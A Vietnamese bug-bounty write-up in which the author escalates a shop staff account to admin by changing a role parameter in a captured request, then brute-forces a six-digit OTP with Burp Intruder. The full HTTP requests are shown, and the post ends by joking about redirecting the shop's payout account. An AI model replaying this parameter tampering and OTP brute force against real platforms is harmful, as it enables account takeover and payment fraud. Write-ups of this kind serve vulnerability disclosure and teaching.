takeover

Sáu số không

Hình như mình có cái aura, mình tìm được bug gì hay hay một tí ở program nào thì ngay lập tức program đó dẹp tiệm 🙁 Buồn, lâu lâu mới có program chơi, đục chưa đã thì nó đã đóng 🙁 Đang trong thời gian thất nghiệp nghèo đói nữa chứ 🙁

Thôi thì sự thật phũ phàng, không còn gì đào móc ở program đó được nữa thì mình chuyển qua program khác. Lần này là một program mới toanh. Làm program cũ có cái lợi đó là mình đã tìm hiểu cái program đó lâu rồi, flow chương trình mình đã nắm rồi, có những endpoint nào dễ bị attack thì mình cũng đã review rồi, nên khá dễ cho mình trong việc tìm bug. Còn program mới thì mặc dù nhiều low-hanging fruit, bug dễ, nhìn phát là thấy, tuy nhiên khi program mới vừa start thì có rất rất nhiều researcher khác lao vào tìm lỗi, dẫn đến việc “trâu chậm uống nước đục”, duplicate cứ gọi là nhiều như lá mùa thu vậy. Cũng đành chịu thôi biết sao giờ.

Target lần này là một platform bán hàng. Đúng như quy trình test thông thường, mình vào đăng ký một tài khoản trên trang của shop. Lướt lướt một vòng thì thấy trang này có chức năng add thêm tài khoản khác để làm các công việc như operator và cashier. Mình add thử một cashier và bắt request lại:

POST /customer/staff/createStaff HTTP/1.1
Host: shop.tld
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 88
Connection: close
Referer: https://shop.tld/customer/info
Cookie: PHPSESSID=3iq58fpdt3t7dnut3qs918gvr2; _ga=GA1.2.466966956.1568112176; _gid=GA1.2.1237610805.1568112176; _fbp=fb.1.1568112176898.805353260;

fullname=xxx&tel=0900000000&role=cashier&password=0okmnji9&retype_pw=0okmnji9&otp=

Ơ mà nếu mình thay cashier thành admin thì sao nhỉ? Edit request thành:

POST /customer/staff/createStaff HTTP/1.1
Host: shop.tld
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 88
Connection: close
Referer: https://shop.tld/customer/info
Cookie: PHPSESSID=3iq58fpdt3t7dnut3qs918gvr2; _ga=GA1.2.466966956.1568112176; _gid=GA1.2.1237610805.1568112176; _fbp=fb.1.1568112176898.805353260;

fullname=xxx&tel=0900000000&role=admin&password=0okmnji9&retype_pw=0okmnji9&otp=

Response trả về:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Sep 2019 16:14:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload;
Content-Length: 82

{"success":true,"message":"OTP is successfully sent to 090000000"}

Hay lắm, có vẻ như add được admin rồi. Nhưng mà chỗ này lại vướng cái OTP nhỉ 😕 Add vào bằng số điện thoại của mình thì không nói làm gì, add bằng số điện thoại bất kỳ thử xem?

Đến đây thì mình lại nhớ đến ngày xưa, lúc mình mới chập chững học bảo mật, có lần mình thấy một cái write-up cho bug bounty program của Facebook, $15000. Lúc đó mình đã nghĩ không biết đến khi nào mình mới được số bounty chừng đó. Mặc dù cho đến nay số lẻ trong bounty đó mình còn chưa có được, nhưng kỹ thuật áp dụng trong write-up đó thì giờ đây mình đã có cơ hội áp dụng 🙂

Thực hiện brute-force OTP bằng request sau. Bởi vì OTP chỉ có 6 chữ số, nên số request tối đa cần thực hiện chỉ là một triệu. Nhét vào Intruder, nhấn Start Attack và ngồi đợi thôi =]]

POST /shop/validateOTP HTTP/1.1
Host: shop.tld
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 10
Connection: close
Referer: https://shop.tld/customer/info
Cookie: PHPSESSID=3iq58fpdt3t7dnut3qs918gvr2; _ga=GA1.2.466966956.1568112176; _gid=GA1.2.1237610805.1568112176; _fbp=fb.1.1568112176898.805353260;

otp=[from 000000 to 999999]

Và kết quả là…

Add được admin vào shop rồi thì… làm gì nữa đây các bạn? Chẳng lẽ đi sửa tên shop, sửa số tài khoản của shop thành của mình để tiền về ư =]]]]

Happy hacking!